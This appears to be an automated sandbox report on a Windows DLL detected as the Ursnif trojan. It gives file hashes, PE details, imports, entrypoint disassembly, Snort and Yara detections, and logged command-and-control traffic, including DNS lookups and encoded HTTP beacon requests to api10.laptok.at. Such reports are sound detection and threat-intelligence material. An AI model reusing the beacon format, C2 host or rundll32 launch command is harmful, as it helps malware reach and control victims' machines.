File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	89
Entropy (8bit):	4.411614364643764
Encrypted:	false
SSDEEP:	3:oVXUYzbUrWqAW8JOGXnEYzbUrWgn:o9UYzwrl9qEYzwrv
MD5:	00ECA81511259FF58F097AA3701BB729
SHA1:	E002895091FC5D9EF7461950886E9ABBD71AC219
SHA-256:	09C86668E713E5ECC72A8478CF3FBD049B94AD6C777B7708C883CDA92240BCCF
SHA-512:	ABCDA1E47CDCCE103C95F860A5ABD550AF0EA8E07C26C5301D16B5E2260D972FC0757B4547A0D53EDC709CDFF1EFD10643BBABA258E882ADF79427694FD4FA64
Malicious:	false
Preview:	[2021/10/07 16:21:31.574] Latest deploy version: ..[2021/10/07 16:21:31.574] 11.211.2 ..

C:\Users\user\AppData\Local\Temp\~DF302033FC2C26A542.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12933
Entropy (8bit):	0.4062588728086082
Encrypted:	false
SSDEEP:	12:c9lCg5/9lCgeK9l26an9l26an9l8fREF9l8fRE9lTqSd3SfGDE:c9lLh9lLh9lIn9lIn9lo09loE9lW6it
MD5:	71D24CEC0984F1D3C4CECED1D6C926F8
SHA1:	EA75BEC02ACD81F67EA2E7A050E01AB4235AF077
SHA-256:	F62B14D503003ECCF51AAB536D7B469E41789CA4B2311BF555B50F3E0B40D26E
SHA-512:	2982730976D55BC2B2436D340D67DEC61D66F9AD8801EB8CA725D67363E1DE52C2A4000DA7E605155512D860A9324FA628A87BDD35B83A7D0F9554CA329039BF
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF677CE89DC6A9E9DB.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40209
Entropy (8bit):	0.6802519082787714
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+Ye0FOna+Zaq5AXXCa+Zaq5AXXxa+Zaq5AXXS:kBqoxKAuqR+Ye0FOnaTqKCaTqKxaTqKS
MD5:	5C7DEF89A84EAA98430FE7027564DF78
SHA1:	D44DA4534C89ADA5E783ADCB8ABEA0AB95CA6543
SHA-256:	66C837632C5CC0A0B18B23E886B8337839514DD7FE99FD4131A44245712064B8
SHA-512:	748FC1AA8D28970F1EDF70A508D99535AA388F0C8B8C66ADC7D18DD85674FC03806A34CA4125A049DDF307B8D40138B61C53946817623160E8414C3A9E2E18B9
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFB9EDA9C4DE41A518.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40129
Entropy (8bit):	0.6668058381904368
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+Z3lUXcfYPKkgm/QfYPKkgm/JYPKkgm/a:kBqoxKAuqR+Z3lUXcfYPxIfYPxhYPxy
MD5:	D6EE8E5C275A86A97B906F4AEDDA6134
SHA1:	63C95AA3BE00D6B6C69EB6A0E42D91FCE098718C
SHA-256:	B53595D99A0C685EBB1CC8CE1618F6EFD33F2B4B75BD07166DB2CC7ABA0B88FE
SHA-512:	913250ECBE792ADCD00C6A409EA38BDA6ACF6B3F1C057A8B7BD4A7FF9784B3B179EF3C333BB5A9C999CD549BECA40765260CC3F9E42EFF50734EB6987FB38FF0
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFED4BB5723C2F8450.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12933
Entropy (8bit):	0.40471074511354194
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lojv9lojv9lWj/b:kBqoIjwjOjz
MD5:	5CA3A3BB7ABE9DC52F89ACAE580DD584
SHA1:	35081451F3DAE228AE3AFA7AAF835D9F2AA1A0EA
SHA-256:	C91DAE2CF83E6662D924132FEFA3347DF0B845E3B3AD46691C8B3ACDF7A08752
SHA-512:	34E1D4659E340E3C0109315D43E0B63B9CE1E99CC3FF4ABDB775D0B76EA6CFD7F9A70199683E07776B136E9279BE25DE28A7D95E466864CCDC18B9E0B9555794
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.27197014467762
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.39% Win16/32 Executable Delphi generic (2074/23) 0.21% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% VXD Driver (31/22) 0.00%
File name:	2e.dll
File size:	79704
MD5:	92a0f1023e064a46fbf2e6bb697edf55
SHA1:	d2d28a35de82e8161266355a351a1e5822d49303
SHA256:	2e012edb93bb99de397b629cdc44d7516f9e6f47cd7106c93d2d6fd66a37af87
SHA512:	1ac25076dc2214eba995e2fab4e4ef43d998d7b75729efa3a9f75907cc18e088669444498a5f0111d237e361d0221fe6b8f1a5a9c8cdb9237e0b657a4f935b50
SSDEEP:	1536:S6+YO9+zA3PG713sAOFU+okNIXnioQ+Zw:SQO9+zAe71JykkNIXnjw
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`...........!...2.D..........@........`...............................`.......'.....................................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10001240
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
DLL Characteristics:
Time Stamp:	0x6008010E [Wed Jan 20 10:08:14 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	ff4d958d1b207f788303c2824dcf7c89

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=MHVROHWNPUNPYUVDPT
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	1/20/2021 8:14:49 AM 1/1/2040 12:59:59 AM
Subject Chain	CN=MHVROHWNPUNPYUVDPT
Version:	3
Thumbprint MD5:	08CCE083A5F15BBCB12A773F84B1C54B
Thumbprint SHA-1:	1B184C8F112872329F0305241D2CE46BCFF9D291
Thumbprint SHA-256:	B68B47B76E495611F29CD73B2184C2E24A4CAC0161C902D42588E075D7B7EB95
Serial:	36CB7E2011A25C9644D2EF1B2384DF4C

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 0000009Ch
mov dword ptr [ebp-08h], 00001AC9h
mov dword ptr [ebp-04h], 00000000h
mov dword ptr [ebp-08h], 00001AC9h
mov dword ptr [ebp-08h], 00001AC9h
mov dword ptr [ebp-08h], 00001AC9h
mov dword ptr [ebp-08h], 00001AC9h
mov dword ptr [ebp-08h], 00001AC9h
mov dword ptr [ebp-08h], 00001AC9h
mov dword ptr [ebp-08h], 00001AC9h
mov dword ptr [ebp-08h], 00001AC9h
mov dword ptr [ebp-08h], 00001AC9h
mov dword ptr [ebp-08h], 00001AC9h
mov ecx, dword ptr [ebp+08h]
mov dword ptr [10014354h], ecx
mov dword ptr [10014334h], ebp
mov dword ptr [ebp-0Ch], 00000064h
lea eax, dword ptr [ebp-0Ch]
push eax
lea ecx, dword ptr [ebp-78h]
push ecx
call dword ptr [1001366Ch]
movzx edx, byte ptr [ebp-78h]
cmp edx, 4Ah
jne 00007F8798F4A03Bh
movzx eax, byte ptr [ebp-76h]
cmp eax, 68h
jne 00007F8798F4A032h
movzx ecx, byte ptr [ebp-74h]
cmp ecx, 44h
jne 00007F8798F4A029h
xor eax, eax
jmp 00007F8798F4CE05h
mov dword ptr [ebp-00000084h], 00000001h
mov dword ptr [ebp-0000008Ch], 00000001h
mov dword ptr [ebp-00000094h], 00000001h
mov dword ptr [ebp-7Ch], 00000001h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x130e0	0xa0	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x12200	0x1558
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x15000	0x470	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1342c	0x2ac	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x43ae	0x4400	False	0.112764246324	data	4.33287623125	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data2	0x6000	0x64	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rdata	0x7000	0xbc04	0xbe00	False	0.910916940789	data	7.78728301124	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x13000	0x13b4	0x1400	False	0.4572265625	data	5.39696866676	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0x15000	0x470	0x600	False	0.6484375	data	5.29273292424	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	LoadLibraryA, GetProcAddress, LoadResource, GetModuleHandleA, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, QueryPerformanceCounter, GetLastError, FindResourceExW, FindResourceW, LockResource, SizeofResource, GetModuleHandleW, GetModuleFileNameW, lstrcpynW, LoadLibraryExA, LoadLibraryExW, FreeLibrary, ExpandEnvironmentStringsW, lstrcpyW, GetFileAttributesW, LoadLibraryW, LCMapStringW, FreeEnvironmentStringsW, SetStdHandle, QueueUserAPC, ClearCommError, GetDiskFreeSpaceA, GetProfileSectionW, SetConsoleCursorPosition, GetTempPathW, VerSetConditionMask, GetSystemWindowsDirectoryW, SetVolumeMountPointW, GetFileType, lstrcmp, IsBadHugeWritePtr, CreateMutexW, EnumDateFormatsA, GetStringTypeExW, GetTapeStatus, TransactNamedPipe, SetThreadAffinityMask, EnumLanguageGroupLocalesA, CreateJobObjectW, lstrcmpA, ScrollConsoleScreenBufferW, _lcreat, GetVolumePathNameW, GetSystemDirectoryA, ResetWriteWatch, GlobalGetAtomNameW, SetCriticalSectionSpinCount, DefineDosDeviceA, GetLogicalDrives, SetConsoleCtrlHandler, MoveFileExW, HeapSize, RequestDeviceWakeup, ReadFile, GetProcessPriorityBoost, WriteProfileSectionA, TlsFree, IsDebuggerPresent, InterlockedCompareExchange, TlsAlloc, TlsGetValue, TlsSetValue, GetSystemTime, GetFullPathNameW, GetFullPathNameA, LockFileEx, LockFile, Sleep, UnlockFile, GetFileSize, SetEndOfFile, FlushFileBuffers, SetFilePointer, WriteFile, CloseHandle, WideCharToMultiByte, GetTempPathA, CreateFileW, CreateFileA, GetFileAttributesA, GetVersionExA, DeleteFileW, DeleteFileA, SetLastError, InterlockedExchange, lstrlenA, RaiseException
USER32.dll	LoadCursorA, CharUpperA, GetClipboardData, GetMessagePos, wsprintfW, LoadStringW, CharToOemW, SetCapture, CallNextHookEx, GetOpenClipboardWindow, VkKeyScanExW, SetMenuItemInfoW, CloseDesktop, EnumDisplaySettingsW, LoadIconW, RegisterClassExA, LookupIconIdFromDirectoryEx, CharUpperBuffA, DdeInitializeW, SetPropW, GetActiveWindow, GetDlgItemTextA, SetWindowsHookA, EnumDesktopsA, DeferWindowPos, EnumWindowStationsA, GetClipboardOwner, PostThreadMessageW, GetSysColorBrush, SetParent, ShowOwnedPopups, RealGetWindowClassW, RegisterClassExW, DdeFreeStringHandle
GDI32.dll	RealizePalette, GetBkMode, GdiEntry12, CreateDiscardableBitmap, GdiAddGlsBounds, SetTextColor, GdiGetDC, STROBJ_bGetAdvanceWidths
ADVAPI32.dll	GetUserNameA, RegOpenKeyA, LookupAccountSidW, RegCloseKey, AllocateAndInitializeSid
SHELL32.dll	SHQueryRecycleBinA, ShellExecuteExA, ExtractIconExA, WOWShellExecute, SHLoadNonloadedIconOverlayIdentifiers, SHGetDataFromIDListW, SHAddToRecentDocs, SHCreateDirectoryExA, DuplicateIcon, SHGetSpecialFolderPathW
ole32.dll	CoInitializeEx, CoInitializeSecurity, CoCreateInstance, CoUninitialize
SHLWAPI.dll	StrChrIA, StrRStrIW, StrCmpNIW, PathAppendW

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
10/07/21-16:20:47.437292	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49792	80	192.168.2.4	87.106.18.141
10/07/21-16:20:47.437292	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49792	80	192.168.2.4	87.106.18.141
10/07/21-16:21:32.362408	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49824	80	192.168.2.4	87.106.18.141

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2021 16:20:47.406502962 CEST	49792	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:20:47.407130957 CEST	49793	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:20:47.428611994 CEST	80	49792	87.106.18.141	192.168.2.4
Oct 7, 2021 16:20:47.428718090 CEST	49792	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:20:47.428965092 CEST	80	49793	87.106.18.141	192.168.2.4
Oct 7, 2021 16:20:47.429749012 CEST	49793	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:20:47.437292099 CEST	49792	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:20:47.459446907 CEST	80	49792	87.106.18.141	192.168.2.4
Oct 7, 2021 16:20:47.510512114 CEST	80	49792	87.106.18.141	192.168.2.4
Oct 7, 2021 16:20:47.510575056 CEST	49792	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:20:47.809303045 CEST	49792	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:20:47.831645012 CEST	80	49792	87.106.18.141	192.168.2.4
Oct 7, 2021 16:20:47.857217073 CEST	80	49792	87.106.18.141	192.168.2.4
Oct 7, 2021 16:20:47.857317924 CEST	49792	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:20:48.718842983 CEST	49792	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:20:48.720160961 CEST	49793	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:21:32.339324951 CEST	49823	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:21:32.339402914 CEST	49824	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:21:32.360322952 CEST	80	49824	87.106.18.141	192.168.2.4
Oct 7, 2021 16:21:32.360430956 CEST	49824	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:21:32.361443043 CEST	80	49823	87.106.18.141	192.168.2.4
Oct 7, 2021 16:21:32.362091064 CEST	49823	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:21:32.362407923 CEST	49824	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:21:32.383151054 CEST	80	49824	87.106.18.141	192.168.2.4
Oct 7, 2021 16:21:32.410106897 CEST	80	49824	87.106.18.141	192.168.2.4
Oct 7, 2021 16:21:32.410197973 CEST	49824	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:21:32.624552011 CEST	49824	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:21:32.670840979 CEST	80	49824	87.106.18.141	192.168.2.4
Oct 7, 2021 16:21:32.670943975 CEST	49824	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:21:33.698580980 CEST	49824	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:21:33.698653936 CEST	49823	80	192.168.2.4	87.106.18.141

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2021 16:20:47.362231970 CEST	64801	53	192.168.2.4	8.8.8.8
Oct 7, 2021 16:20:47.380968094 CEST	53	64801	8.8.8.8	192.168.2.4
Oct 7, 2021 16:21:32.303180933 CEST	49612	53	192.168.2.4	8.8.8.8
Oct 7, 2021 16:21:32.328233004 CEST	53	49612	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 7, 2021 16:20:47.362231970 CEST	192.168.2.4	8.8.8.8	0x67ce	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Oct 7, 2021 16:21:32.303180933 CEST	192.168.2.4	8.8.8.8	0x3b39	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 7, 2021 16:20:47.380968094 CEST	8.8.8.8	192.168.2.4	0x67ce	No error (0)	api10.laptok.at		87.106.18.141	A (IP address)	IN (0x0001)
Oct 7, 2021 16:21:32.328233004 CEST	8.8.8.8	192.168.2.4	0x3b39	No error (0)	api10.laptok.at		87.106.18.141	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

api10.laptok.at

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49792	87.106.18.141	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Oct 7, 2021 16:20:47.437292099 CEST	1970	OUT	GET /api1/DGBXE3uXrLTWiBjVyk/VC7Ta4hFF/xsAyuQ20ayjuhLgkiSkm/m3K_2FmdKtkRCW_2B7u/tXHmCyMHbP9slqB1L8zpaC/nfhvJ6s58irru/pNJBMQ_2/B9Q8wSf7euVWpy0kLFFtWzz/vAwDCO_2Fo/3v4FyeGSRuSjMupWH/_2BEQ6znA7PT/8caxgyO1tr2/cTDPOBy_2FHAvv/tgKZ2JSY8uZo5PCTnq6VX/_2F2Vff20_2Fr9ux/TFmLX_2BIHd1Zmp/Jqw_2BLpi2pH8Zi61P/xEqI3ryES/n6BjkuL3N3RbBmMCK9xy/loeot0z7U9fUAU78A6C/ywgL0kQB0_2BMve6S_2Flf/2SujN_2Fl/B HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Oct 7, 2021 16:20:47.510512114 CEST	1971	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Thu, 07 Oct 2021 14:20:47 GMT Content-Type: text/plain Transfer-Encoding: chunked Connection: keep-alive Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Oct 7, 2021 16:20:47.809303045 CEST	1971	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Oct 7, 2021 16:20:47.857217073 CEST	1971	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Thu, 07 Oct 2021 14:20:47 GMT Content-Type: text/plain Transfer-Encoding: chunked Connection: keep-alive Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49824	87.106.18.141	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Oct 7, 2021 16:21:32.362407923 CEST	5628	OUT	GET /api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1PHO/5acsxz5qxHDpv8YBmMuvj7/KGpLxQcloIDfE/SXYboMNK/ZGVNwVWGfnWgXZ7LibENrAZ/rGu1uarUfj/FSkhkIGZ0I6ED2ThT/iotSrHt6InUD/umvaUlfqIMb/01G4_2FdSHt_2F/JPI5oPhpcVsnT5eUGv8s0/LSKuaJdd_2FAe_2F/vQT2v29m9TEniEM/b63Yg6FSycj4oUXo8F/FUMOEIDKM/JTkYuf9RIKrVWGrferoc/GwDXbtZ7LjM2klfVose/Bk9CRR6n/Lu2z5l HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Oct 7, 2021 16:21:32.410106897 CEST	5629	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Thu, 07 Oct 2021 14:21:32 GMT Content-Type: text/plain Transfer-Encoding: chunked Connection: keep-alive Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Oct 7, 2021 16:21:32.624552011 CEST	5629	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Oct 7, 2021 16:21:32.670840979 CEST	5629	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Thu, 07 Oct 2021 14:21:32 GMT Content-Type: text/plain Transfer-Encoding: chunked Connection: keep-alive Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 796 Parent PID: 980

General

Start time:	16:19:49
Start date:	07/10/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\2e.dll'
Imagebase:	0xfd0000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.803227069.0000000003A48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.1203393631.0000000003149000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.803315900.0000000003A48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.1203601349.0000000003A48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.803348643.0000000003A48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.803173940.0000000003A48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.803390693.0000000003A48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.1202749084.0000000000D60000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.803371540.0000000003A48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.1202777990.0000000000E00000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.803277362.0000000003A48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.803130026.0000000003A48000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 5236 Parent PID: 796

General

Start time:	16:19:50
Start date:	07/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2e.dll',#1
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4872 Parent PID: 5236

General

Start time:	16:19:50
Start date:	07/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\2e.dll',#1
Imagebase:	0x1c0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.901240382.0000000002F90000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.899624754.0000000005768000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.899679328.0000000005768000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.899458212.0000000005768000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.899498607.0000000005768000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.899414511.0000000005768000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.901603317.0000000005768000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.901405735.00000000030E0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.901669349.0000000010000000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.900182748.0000000004CE9000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.899563679.0000000005768000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.899592894.0000000005768000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.899658912.0000000005768000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6632 Parent PID: 800

General

Start time:	16:20:45
Start date:	07/10/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff7e25b0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5044 Parent PID: 6632

General

Start time:	16:20:45
Start date:	07/10/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6632 CREDAT:17410 /prefetch:2
